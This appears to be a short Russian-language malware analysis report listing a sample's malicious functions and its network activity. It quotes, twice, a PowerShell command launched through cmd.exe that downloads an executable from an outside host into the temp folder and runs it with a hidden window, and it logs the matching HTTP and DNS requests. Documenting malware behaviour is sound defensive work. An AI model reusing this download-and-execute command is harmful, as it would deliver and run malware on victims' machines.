Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $url.tostring(
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell Foreach($url in @({http://mycustomized.com/system/logs/1.exe})){try{$path = '%tmp%\38729.exe';(New-Object System.Net.WebClient).DownloadFile($url.ToString(), $path);Start-Process ...
Сетевая активность
Подключается к
- 'my####omized.com':80
TCP
Запросы HTTP GET
- http://my####omized.com/system/logs/1.exe
UDP
- DNS ASK my####omized.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell Foreach($url in @({http://mycustomized.com/system/logs/1.exe})){try{$path = '%tmp%\38729.exe';(New-Object System.Net.WebClient).DownloadFile($url.ToString(), $path);Start-Process ...' (со скрытым окном)
